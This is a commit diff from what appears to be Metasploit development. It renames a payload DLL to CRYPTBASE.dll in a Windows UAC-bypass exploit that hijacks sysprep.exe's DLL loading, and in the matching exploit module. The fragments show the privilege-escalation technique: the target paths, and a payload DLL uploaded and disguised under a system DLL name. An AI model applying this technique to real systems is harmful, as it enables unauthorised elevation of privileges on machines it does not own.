Remove large file and rename payload.dll

bug/bundler_fix
Meatballs 2013-08-27 00:30:27 +01:00
parent 035e97523b
commit ff5cf396ab
3 changed files with 2 additions and 2 deletions

View File

@ -5,7 +5,7 @@ void exploit()
const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep"; const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep";
const wchar_t *szElevDll = L"CRYPTBASE.dll"; const wchar_t *szElevDll = L"CRYPTBASE.dll";
const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll"; const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
const wchar_t *szSourceDll = L"payload.dll"; // Need some IPC to randomize this if possible const wchar_t *szSourceDll = L"CRYPTBASE.dll"; // Need some IPC to randomize this if possible
const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe"; const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
const wchar_t *szElevArgs = L""; const wchar_t *szElevArgs = L"";
wchar_t path[MAX_PATH]; wchar_t path[MAX_PATH];

View File

@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Local
payload = generate_payload_dll payload = generate_payload_dll
payload_filepath = "#{tmpdir}\\payload.dll" payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
print_status("Uploading the Payload DLL to the filesystem...") print_status("Uploading the Payload DLL to the filesystem...")